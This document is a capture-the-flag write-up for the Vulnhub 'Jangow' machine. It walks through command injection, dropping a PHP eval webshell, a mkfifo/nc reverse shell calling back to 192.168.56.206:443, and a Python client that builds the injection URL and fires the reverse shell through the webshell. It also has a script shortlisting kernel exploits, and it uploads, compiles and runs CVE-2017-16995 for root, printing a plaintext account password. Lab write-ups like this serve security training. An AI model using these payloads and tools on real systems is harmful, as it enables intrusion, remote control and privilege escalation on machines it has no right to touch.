(www-data:/var/www/html/site) $ echo '<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 443 >/tmp/f");?>' > rev.php
(www-data:/var/www/html/site) $ ls
assets
busque.php
css
index.html
js
shell.php
wordpress
(www-data:/var/www/html/site) $ ls -alh
total 44K
drwxr-xr-x 6 www-data www-data 4.0K Nov 26 08:05 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
drwxr-xr-x 3 www-data www-data 4.0K Jun 3 2021 assets
-rw-r--r-- 1 www-data www-data 35 Jun 10 2021 busque.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 css
-rw-r--r-- 1 www-data www-data 10K Jun 10 2021 index.html
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 js
-rw-r--r-- 1 www-data www-data 30 Nov 26 08:15 shell.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 10 2021 wordpress
(www-data:/var/www/html/site) $ pwd
/var/www/html/site
(www-data:/var/www/html/site) $ python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.206',443));"
ret=2
(www-data:ret=2) $ touch 111.php
/bin/sh: 1: cd: can't cd to ret=2
Unlike the usual case, creating the file with echo did not work from the AntSword terminal (rev.php never appears in the listing above), so the file was created and its contents edited with AntSword's own file manager instead:
(www-data:/var/www/html/site) $ ls
111.php
assets
busque.php
css
index.html
js
reverse.php
shell.php
wordpress
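The same steps in script form: the exact injection URL that drops the eval() webshell (the hand-encoded URL above, generated rather than typed), a small client that runs commands through it the way AntSword does, and the mkfifo reverse shell command. This is an added example, not the write-up's or AntSword's code; the sentinel string, the shell.php location and the assumption that shell_exec() is allowed by the target's PHP configuration are this example's own.

```python
"""Client for the eval($_POST["cmd"]) webshell from the write-up, plus the
two command strings that matter on this box: the injection URL that drops the
webshell, and a reverse shell that works when nc has no -e.

Added example, not from the original write-up or from AntSword. Host, URLs
and the sentinel string are assumptions taken from the write-up's setup.
"""
import shlex
from urllib.parse import quote, urlencode
from urllib.request import Request, urlopen

INJECT_URL = "http://192.168.56.118/site/busque.php"  # from the write-up
SHELL_URL = "http://192.168.56.118/site/shell.php"    # where the webshell was dropped
WEBSHELL_PHP = '<?php eval($_POST["cmd"]); ?>'
MARK = "__JANGOW_END__"   # sentinel so our output can be told apart from the page


def drop_webshell_url(inject_url=INJECT_URL, filename="shell.php"):
    """URL that makes the injection point write WEBSHELL_PHP next to busque.php.
    shlex.quote keeps the PHP intact for the target's shell; quote(safe='')
    keeps it intact in the query string (the hand-encoded form in the write-up)."""
    cmd = f"echo {shlex.quote(WEBSHELL_PHP)} > {shlex.quote(filename)}"
    return f"{inject_url}?buscar={quote(cmd, safe='')}"


def php_str(s):
    """Single-quoted PHP string literal: only backslash and quote need escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_for(cmd):
    """PHP that eval() will run: execute cmd with stderr merged, then print the sentinel."""
    return f"echo shell_exec({php_str(cmd + ' 2>&1')}) . {php_str(MARK)};"


def http_post(url, fields, timeout=10.0):
    """Live transport: form-encoded POST, body returned as text."""
    req = Request(url, data=urlencode(fields).encode(), method="POST")
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def exec_cmd(cmd, url=SHELL_URL, transport=http_post):
    """Run one command through the webshell and return its output."""
    body = transport(url, {"cmd": php_for(cmd)})
    if MARK not in body:
        raise RuntimeError("webshell did not execute our PHP: " + body[:200])
    return body.split(MARK, 1)[0]


def reverse_shell_cmd(lhost, lport, fifo="/tmp/f"):
    """mkfifo pipeline (the form used in the write-up): shell input comes from
    the fifo, its output goes out through nc, so no -e support is needed."""
    return (f"rm -f {fifo}; mkfifo {fifo}; "
            f"cat {fifo} | /bin/sh -i 2>&1 | nc {lhost} {lport} > {fifo}")


if __name__ == "__main__":
    print(drop_webshell_url())
    print(exec_cmd("id"))
    # start `nc -nlvp 443` on the attacker first; this request blocks while the shell lives
    exec_cmd(reverse_shell_cmd("192.168.56.206", 443))
```

The sentinel is what makes the client robust: busque.php and shell.php both return an otherwise empty body, so without it a blank response from a blocked command is indistinguishable from a command that simply printed nothing.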
Now request reverse.php in the browser. Note that the callback port has to be 443, because the target has a firewall (recall the 65533 filtered ports in the Nmap scan).
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo nc -nlvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.118] 44358
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:16:54 up 1:30, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/$ cd /home
cd /home
www-data@jangow01:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 31 2021 .
drwxr-xr-x 24 root root 4.0K Jun 10 2021 ..
drwxr-xr-x 4 jangow01 desafio02 4.0K Jun 10 2021 jangow01
www-data@jangow01:/home$ cd jangow01
cd jangow01
www-data@jangow01:/home/jangow01$ cd /tmp
cd /tmp
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit kernel 4.4.0-31
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Refere | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Refere | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged | macos/local/40957.c
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrec | multiple/dos/40955.txt
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrec | multiple/dos/40955.txt
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation ( | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation ( | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_ | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Priv | windows_x86-64/local/47170.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KAS | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privi | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Check | multiple/dos/46300.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Pri | hardware/local/48644.c
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Privilege escalation
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit -m linux/local/45010.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Vulnhub/jangow_2/45010.c
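The searchsploit listing mixes DoS proofs of concept, other platforms and kernels that never matched. The following script (an added example, not from the original write-up) parses the version ranges in the titles, compares them with uname -r and keeps only the local privilege escalation rows that cover 4.4.0-31; it goes a step beyond the write-up by handling both range forms that appear in the listing. The comparison rule for bounds without an Ubuntu ABI suffix is this example's own assumption; the sample rows are copied from the output above.

```python
"""Shortlist searchsploit kernel rows that cover the target's kernel.

Added example, not from the original write-up. It parses the two range forms
seen in the listing above ('Linux Kernel < 4.13.9 ...' and
'Linux Kernel 4.4.0-21 < 4.4.0-51 ...'), compares them against uname -r
(4.4.0-31-generic here), keeps only local-privilege-escalation rows, and
drops DoS PoCs and other platforms. The sample rows below are copied from the
searchsploit output; the selection rule is this example's own assumption.
"""
import re

VER = r"\d+(?:\.\d+)+(?:-\d+)?"               # 4.13.9, 4.4.0-116, 3.11
VER_RE = re.compile(VER)
RANGE_RE = re.compile(rf"(?:(?P<lo>{VER})\s*)?<\s*(?P<hi>{VER})")
ROW_RE = re.compile(r"^\s*(?P<title>\S.*?)\s*\|\s*(?P<path>\S+)\s*$")
OTHER_PLATFORMS = ("solaris/", "windows/", "macos/", "osx/", "ios/", "android/", "hardware/")


def parse_version(text):
    """'4.4.0-31-generic' -> ((4, 4, 0), 31); '4.13.9' -> ((4, 13, 9), None)."""
    m = VER_RE.search(text)
    if not m:
        return None
    upstream, _, abi = m.group(0).partition("-")
    parts = [int(p) for p in upstream.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3]), (int(abi) if abi else None)


def _lt(a, b):
    """a < b. When either side lacks an Ubuntu ABI number (the -NN suffix),
    only the upstream version is compared, so '< 4.13.9' covers any 4.4.0-NN."""
    if a[1] is None or b[1] is None:
        return a[0] < b[0]
    return (a[0], a[1]) < (b[0], b[1])


def in_range(target, lo, hi):
    """lo <= target < hi, with lo optional."""
    if lo is not None and _lt(target, lo):
        return False
    return _lt(target, hi)


def shortlist(listing, uname_r):
    """[(exploit-db path, title)] for rows worth trying on this kernel."""
    target = parse_version(uname_r)
    hits = []
    for line in listing.splitlines():
        row = ROW_RE.match(line)
        if not row or not row["title"].lower().startswith("linux kernel"):
            continue
        title, path = row["title"], row["path"]
        # Keep local-privesc rows only. Match on '/local/' rather than a 'linux/'
        # prefix: 47170 (AF_PACKET, a real 4.4.0-21..51 candidate) is filed under
        # windows_x86-64/ in exploit-db, so a prefix check would miss it.
        if "/local/" not in path or path.startswith(OTHER_PLATFORMS):
            continue
        for m in RANGE_RE.finditer(title):
            lo = parse_version(m["lo"]) if m["lo"] else None
            if in_range(target, lo, parse_version(m["hi"])):
                hits.append((path, title))
                break
    return hits


# Rows copied from the searchsploit output above (a subset).
SAMPLE_LISTING = """\
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Priv | windows_x86-64/local/47170.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
"""

if __name__ == "__main__":
    for path, title in shortlist(SAMPLE_LISTING, "4.4.0-31-generic"):
        print(path, "<-", title)
```

For 4.4.0-31 the shortlist keeps 45010 (the one used below), 44298, 47170 and 41995; it drops the DoS rows, the udev entry whose bound is not a kernel version, and the Solaris row. Titles are a heuristic: a hit still needs the distro build date checked against the CVE fix date before trusting it.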
The kernel reported by the reverse shell is 4.4.0-31-generic (an Ubuntu 16.04 build from July 2016). It is older than 4.13.9, so 45010.c (CVE-2017-16995, an eBPF verifier bug) is a fitting candidate. Use the FTP service to upload 45010.c into /home/jangow01 on the target, a directory that the jangow01 user can write to.
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ls
45010.c config.php linpeas.sh nmap_full_scan php-reverse-shell.php shell.php user.txt
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||14515|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||17105|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 jangow01
226 Directory send OK.
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||42434|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
-rw------- 1 1000 1000 200 Oct 31 2021 .bash_history
-rw-r--r-- 1 1000 1000 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Jun 10 2021 .bashrc
drwx------ 2 1000 1000 4096 Jun 10 2021 .cache
drwxrwxr-x 2 1000 1000 4096 Jun 10 2021 .nano
-rw-r--r-- 1 1000 1000 655 Jun 10 2021 .profile
-rw-r--r-- 1 1000 1000 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
226 Directory send OK.
ftp> put 45010.c
local: 45010.c remote: 45010.c
229 Entering Extended Passive Mode (|||49878|)
150 Ok to send data.
100% |*********************************************************************************| 13176 339.61 MiB/s 00:00 ETA
226 Transfer complete.
13176 bytes sent in 00:00 (19.12 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||35524|)
150 Here comes the directory listing.
-rw------- 1 1000 1000 13176 Jan 01 09:28 45010.c
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
226 Directory send OK.
ftp>
Switch to the jangow01 user (the password recovered from .backup also works for the local account) and compile with gcc. An exploit binary already present in the home directory fails with permission denied (Permissão negada): files that arrive via FTP have no execute bit, as the -rw------- mode on the uploaded 45010.c shows, so compiling on the target avoids that.
www-data@jangow01:/home/jangow01$ su - jangow01
su - jangow01
Password: abygurl69
jangow01@jangow01:~$ ls
ls
45010.c exploit user.txt
jangow01@jangow01:~$ ./exploit
./exploit
-su: ./exploit: Permissão negada
jangow01@jangow01:~$ gcc 45010.c -o exploit1
gcc 45010.c -o exploit1
jangow01@jangow01:~$ ls
ls
45010.c exploit exploit1 user.txt
jangow01@jangow01:~$ ./exploit1
./exploit1
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880039f97c00
[*] Leaking sock struct from ffff88003990b680
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003bee9180
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003bee9180
[*] credentials patched, launching shell...
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4,0K Out 31 2021 .
drwxr-xr-x 24 root root 4,0K Jun 10 2021 ..
-rw------- 1 root root 3,9K Nov 3 2021 .bash_history
-rw-r--r-- 1 root root 3,1K Out 22 2015 .bashrc
drwx------ 2 root root 4,0K Out 31 2021 .cache
drwxr-xr-x 2 root root 4,0K Jun 10 2021 .nano
-rw-r--r-- 1 root root 148 Ago 17 2015 .profile
-rw-r--r-- 1 root root 2,4K Out 31 2021 proof.txt
-rw-r--r-- 1 root root 211 Jun 10 2021 .wget-hsts
# cat proof.txt
cat proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709
#
Lessons learned
- When a target has a command-injection vulnerability but a reverse shell cannot be obtained, try a bind (forward) shell; and when the injected commands are filtered, write a shell.php through the injection and connect to it with a tool such as AntSword.
- During this engagement the Kali attack VM froze several times and had to be restarted.